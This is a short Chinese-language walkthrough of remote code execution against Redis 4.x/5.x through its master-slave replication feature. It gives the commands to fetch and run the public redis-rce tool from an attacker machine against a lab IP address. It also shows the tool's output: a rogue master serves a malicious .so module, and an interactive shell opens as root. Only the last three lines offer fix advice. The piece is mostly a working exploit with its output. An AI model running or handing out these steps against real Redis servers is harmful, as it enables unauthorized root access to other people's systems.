脆弱目标查询漏洞关键词redis 默认端口6379,影响版本 4.x/5.xExp利用攻击机Ubuntu,ip地址192.168.1.107,下载exp脚本,然后输入参数开始。git close https://github.com/Ridter/redis-rce cd redis-rce greekn@greekn:~/redis-rce$ py
脆弱目标查询
漏洞关键词redis 默认端口6379,影响版本 4.x/5.x
Exp利用
攻击机Ubuntu,ip地址192.168.1.107,下载exp脚本,然后输入参数开始。
代码语言:javascript复制git close https://Github.com/Ridter/redis-rce
cd redis-rce
greekn@greekn:~/redis-rce$ Python3 redis-rce.py -r 192.168.1.16 -L 192.168.1.107 -f exp_lin.so
█▄▄▄▄ ▄███▄ ██▄ ▄█ ▄▄▄▄▄ █▄▄▄▄ ▄█▄ ▄███▄
█ ▄▀ █▀ ▀ █ █ ██ █ ▀▄ █ ▄▀ █▀ ▀▄ █▀ ▀
█▀▀▌ ██▄▄ █ █ ██ ▄ ▀▀▀▀▄ █▀▀▌ █ ▀ ██▄▄
█ █ █▄ ▄▀ █ █ ▐█ ▀▄▄▄▄▀ █ █ █▄ ▄▀ █▄ ▄▀
█ ▀███▀ ███▀ ▐ █ ▀███▀ ▀███▀
▀ ▀
[*] Connecting to 192.168.1.16:6379...
[*] Sending SLAVEOF command to server
[ ] Accepted connection from 192.168.1.16:6379
[*] Setting filename
[ ] Accepted connection from 192.168.1.16:6379
[*] Start listening on 192.168.1.107:21000
[*] Tring to run Payload
[ ] Accepted connection from 192.168.1.16:38875
[*] Closing rogue server...
[ ] What do u want ? [i]nteractive shell or [r]everse shell: i
[ ] Interactive shell open , use "exit" to exit...
$ whoami
root
$本次受影响版本
Redis 2.x 3.x 4.x 5.x
修复建议
禁止外部访问redis服务端口
禁止root权限启动redis服务
限制链接redis服务的IP
